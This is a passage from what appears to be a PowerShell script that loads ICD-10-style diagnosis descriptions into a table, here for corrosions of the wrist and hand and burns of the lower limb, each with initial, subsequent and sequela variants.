hand","Corrosion of first degree of multiple sites of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of left wrist and hand","Corrosion of first degree of multiple sites of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of left wrist and hand","Corrosion of first degree of multiple sites of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of left wrist and hand","Corrosion of first degree of multiple sites of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of unspecified wrist and hand","Corrosion of first degree of multiple sites of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of unspecified wrist and hand","Corrosion of first degree of multiple sites of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of unspecified wrist and hand","Corrosion of first degree of multiple sites of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right hand, unspecified site","Corrosion of second degree of right hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right hand, unspecified site","Corrosion of second degree of right hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right hand, unspecified site","Corrosion of second degree of right hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left hand, unspecified site","Corrosion of second degree of left hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left hand, unspecified site","Corrosion of second degree of left hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left hand, unspecified site","Corrosion of second degree of left hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified hand, unspecified site","Corrosion of second degree of unspecified hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified hand, unspecified site","Corrosion of second degree of unspecified hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified hand, unspecified site","Corrosion of second degree of unspecified hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right thumb (nail)","Corrosion of second degree of right thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right thumb (nail)","Corrosion of second degree of right thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right thumb (nail)","Corrosion of second degree of right thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left thumb (nail)","Corrosion of second degree of left thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left thumb (nail)","Corrosion of second degree of left thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left thumb (nail)","Corrosion of second degree of left thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified thumb (nail)","Corrosion of second degree of unspecified thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified thumb (nail)","Corrosion of second degree of unspecified thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified thumb (nail)","Corrosion of second degree of unspecified thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of single right finger (nail) except thumb","Corrosion of second degree of single right finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of single right finger (nail) except thumb","Corrosion of second degree of single right finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of single right finger (nail) except thumb","Corrosion of second degree of single right finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of single left finger (nail) except thumb","Corrosion of second degree of single left finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of single left finger (nail) except thumb","Corrosion of second degree of single left finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of single left finger (nail) except thumb","Corrosion of second degree of single left finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified single finger (nail) except thumb","Corrosion of second degree of unspecified single finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified single finger (nail) except thumb","Corrosion of second degree of unspecified single finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified single finger (nail) except thumb","Corrosion of second degree of unspecified single finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple right fingers (nail), not including thumb","Corrosion of second degree of multiple right fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple right fingers (nail), not including thumb","Corrosion of second degree of multiple right fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple right fingers (nail), not including thumb","Corrosion of second degree of multiple right fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple left fingers (nail), not including thumb","Corrosion of second degree of multiple left fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple left fingers (nail), not including thumb","Corrosion of second degree of multiple left fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple left fingers (nail), not including thumb","Corrosion of second degree of multiple left fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified multiple fingers (nail), not including thumb","Corrosion of second degree of unspecified multiple fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified multiple fingers (nail), not including thumb","Corrosion of second degree of unspecified multiple fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified multiple fingers (nail), not including thumb","Corrosion of second degree of unspecified multiple fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple right fingers (nail), including thumb","Corrosion of second degree of multiple right fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple right fingers (nail), including thumb","Corrosion of second degree of multiple right fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple right fingers (nail), including thumb","Corrosion of second degree of multiple right fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple left fingers (nail), including thumb","Corrosion of second degree of multiple left fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple left fingers (nail), including thumb","Corrosion of second degree of multiple left fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple left fingers (nail), including thumb","Corrosion of second degree of multiple left fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified multiple fingers (nail), including thumb","Corrosion of second degree of unspecified multiple fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified multiple fingers (nail), including thumb","Corrosion of second degree of unspecified multiple fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified multiple fingers (nail), including thumb","Corrosion of second degree of unspecified multiple fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right palm","Corrosion of second degree of right palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right palm","Corrosion of second degree of right palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right palm","Corrosion of second degree of right palm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left palm","Corrosion of second degree of left palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left palm","Corrosion of second degree of left palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left palm","Corrosion of second degree of left palm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified palm","Corrosion of second degree of unspecified palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified palm","Corrosion of second degree of unspecified palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified palm","Corrosion of second degree of unspecified palm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree back of right hand","Corrosion of second degree back of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree back of right hand","Corrosion of second degree back of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree back of right hand","Corrosion of second degree back of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree back of left hand","Corrosion of second degree back of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree back of left hand","Corrosion of second degree back of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree back of left hand","Corrosion of second degree back of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree back of unspecified hand","Corrosion of second degree back of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree back of unspecified hand","Corrosion of second degree back of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree back of unspecified hand","Corrosion of second degree back of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right wrist","Corrosion of second degree of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right wrist","Corrosion of second degree of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right wrist","Corrosion of second degree of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left wrist","Corrosion of second degree of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left wrist","Corrosion of second degree of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left wrist","Corrosion of second degree of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified wrist","Corrosion of second degree of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified wrist","Corrosion of second degree of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified wrist","Corrosion of second degree of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of right wrist and hand","Corrosion of second degree of multiple sites of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of right wrist and hand","Corrosion of second degree of multiple sites of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of right wrist and hand","Corrosion of second degree of multiple sites of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of left wrist and hand","Corrosion of second degree of multiple sites of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of left wrist and hand","Corrosion of second degree of multiple sites of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of left wrist and hand","Corrosion of second degree of multiple sites of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of unspecified wrist and hand","Corrosion of second degree of multiple sites of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of unspecified wrist and hand","Corrosion of second degree of multiple sites of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of unspecified wrist and hand","Corrosion of second degree of multiple sites of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right hand, unspecified site","Corrosion of third degree of right hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right hand, unspecified site","Corrosion of third degree of right hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right hand, unspecified site","Corrosion of third degree of right hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left hand, unspecified site","Corrosion of third degree of left hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left hand, unspecified site","Corrosion of third degree of left hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left hand, unspecified site","Corrosion of third degree of left hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified hand, unspecified site","Corrosion of third degree of unspecified hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified hand, unspecified site","Corrosion of third degree of unspecified hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified hand, unspecified site","Corrosion of third degree of unspecified hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right thumb (nail)","Corrosion of third degree of right thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right thumb (nail)","Corrosion of third degree of right thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right thumb (nail)","Corrosion of third degree of right thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left thumb (nail)","Corrosion of third degree of left thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left thumb (nail)","Corrosion of third degree of left thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left thumb (nail)","Corrosion of third degree of left thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified thumb (nail)","Corrosion of third degree of unspecified thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified thumb (nail)","Corrosion of third degree of unspecified thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified thumb (nail)","Corrosion of third degree of unspecified thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of single right finger (nail) except thumb","Corrosion of third degree of single right finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of single right finger (nail) except thumb","Corrosion of third degree of single right finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of single right finger (nail) except thumb","Corrosion of third degree of single right finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of single left finger (nail) except thumb","Corrosion of third degree of single left finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of single left finger (nail) except thumb","Corrosion of third degree of single left finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of single left finger (nail) except thumb","Corrosion of third degree of single left finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified single finger (nail) except thumb","Corrosion of third degree of unspecified single finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified single finger (nail) except thumb","Corrosion of third degree of unspecified single finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified single finger (nail) except thumb","Corrosion of third degree of unspecified single finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple right fingers (nail), not including thumb","Corrosion of third degree of multiple right fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple right fingers (nail), not including thumb","Corrosion of third degree of multiple right fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple right fingers (nail), not including thumb","Corrosion of third degree of multiple right fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple left fingers (nail), not including thumb","Corrosion of third degree of multiple left fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple left fingers (nail), not including thumb","Corrosion of third degree of multiple left fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple left fingers (nail), not including thumb","Corrosion of third degree of multiple left fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified multiple fingers (nail), not including thumb","Corrosion of third degree of unspecified multiple fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified multiple fingers (nail), not including thumb","Corrosion of third degree of unspecified multiple fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified multiple fingers (nail), not including thumb","Corrosion of third degree of unspecified multiple fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple right fingers (nail), including thumb","Corrosion of third degree of multiple right fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple right fingers (nail), including thumb","Corrosion of third degree of multiple right fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple right fingers (nail), including thumb","Corrosion of third degree of multiple right fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple left fingers (nail), including thumb","Corrosion of third degree of multiple left fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple left fingers (nail), including thumb","Corrosion of third degree of multiple left fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple left fingers (nail), including thumb","Corrosion of third degree of multiple left fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified multiple fingers (nail), including thumb","Corrosion of third degree of unspecified multiple fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified multiple fingers (nail), including thumb","Corrosion of third degree of unspecified multiple fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified multiple fingers (nail), including thumb","Corrosion of third degree of unspecified multiple fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right palm","Corrosion of third degree of right palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right palm","Corrosion of third degree of right palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right palm","Corrosion of third degree of right palm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left palm","Corrosion of third degree of left palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left palm","Corrosion of third degree of left palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left palm","Corrosion of third degree of left palm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified palm","Corrosion of third degree of unspecified palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified palm","Corrosion of third degree of unspecified palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified palm","Corrosion of third degree of unspecified palm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of back of right hand","Corrosion of third degree of back of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of back of right hand","Corrosion of third degree of back of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of back of right hand","Corrosion of third degree of back of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of back of left hand","Corrosion of third degree of back of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of back of left hand","Corrosion of third degree of back of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of back of left hand","Corrosion of third degree of back of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree back of unspecified hand","Corrosion of third degree back of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree back of unspecified hand","Corrosion of third degree back of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree back of unspecified hand","Corrosion of third degree back of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right wrist","Corrosion of third degree of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right wrist","Corrosion of third degree of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right wrist","Corrosion of third degree of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left wrist","Corrosion of third degree of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left wrist","Corrosion of third degree of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left wrist","Corrosion of third degree of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified wrist","Corrosion of third degree of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified wrist","Corrosion of third degree of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified wrist","Corrosion of third degree of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of right wrist and hand","Corrosion of third degree of multiple sites of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of right wrist and hand","Corrosion of third degree of multiple sites of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of right wrist and hand","Corrosion of third degree of multiple sites of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of left wrist and hand","Corrosion of third degree of multiple sites of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of left wrist and hand","Corrosion of third degree of multiple sites of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of left wrist and hand","Corrosion of third degree of multiple sites of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of unspecified wrist and hand","Corrosion of third degree of multiple sites of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of unspecified wrist and hand","Corrosion of third degree of multiple sites of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of unspecified wrist and hand","Corrosion of third degree of multiple sites of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified site of right lower limb, except ankle and foot","Burn of unspecified degree of unspecified site of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified site of right lower limb, except ankle and foot","Burn of unspecified degree of unspecified site of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified site of right lower limb, except ankle and foot","Burn of unspecified degree of unspecified site of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified site of left lower limb, except ankle and foot","Burn of unspecified degree of unspecified site of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified site of left lower limb, except ankle and foot","Burn of unspecified degree of unspecified site of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified site of left lower limb, except ankle and foot","Burn of unspecified degree of unspecified site of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified site of unspecified lower limb, except ankle and foot","Burn of unspecified degree of unspecified site of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified site of unspecified lower limb, except ankle and foot","Burn of unspecified degree of unspecified site of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified site of unspecified lower limb, except ankle and foot","Burn of unspecified degree of unspecified site of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right thigh","Burn of unspecified degree of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right thigh","Burn of unspecified degree of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right thigh","Burn of unspecified degree of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left thigh","Burn of unspecified degree of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left thigh","Burn of unspecified degree of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left thigh","Burn of unspecified degree of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified thigh","Burn of unspecified degree of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified thigh","Burn of unspecified degree of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified thigh","Burn of unspecified degree of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right knee","Burn of unspecified degree of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right knee","Burn of unspecified degree of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right knee","Burn of unspecified degree of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left knee","Burn of unspecified degree of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left knee","Burn of unspecified degree of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left knee","Burn of unspecified degree of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified knee","Burn of unspecified degree of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified knee","Burn of unspecified degree of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified knee","Burn of unspecified degree of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right lower leg","Burn of unspecified degree of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right lower leg","Burn of unspecified degree of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right lower leg","Burn of unspecified degree of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left lower leg","Burn of unspecified degree of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left lower leg","Burn of unspecified degree of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left lower leg","Burn of unspecified degree of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified lower leg","Burn of unspecified degree of unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified lower leg","Burn of unspecified degree of unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified lower leg","Burn of unspecified degree of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of right lower limb, except ankle and foot","Burn of unspecified degree of multiple sites of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of right lower limb, except ankle and foot","Burn of unspecified degree of multiple sites of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of right lower limb, except ankle and foot","Burn of unspecified degree of multiple sites of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of left lower limb, except ankle and foot","Burn of unspecified degree of multiple sites of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of left lower limb, except ankle and foot","Burn of unspecified degree of multiple sites of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of left lower limb, except ankle and foot","Burn of unspecified degree of multiple sites of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of unspecified lower limb, except ankle and foot","Burn of unspecified degree of multiple sites of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of unspecified lower limb, except ankle and foot","Burn of unspecified degree of multiple sites of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of unspecified lower limb, except ankle and foot","Burn of unspecified degree of multiple sites of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified site of right lower limb, except ankle and foot","Burn of first degree of unspecified site of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified site of right lower limb, except ankle and foot","Burn of first degree of unspecified site of right lower 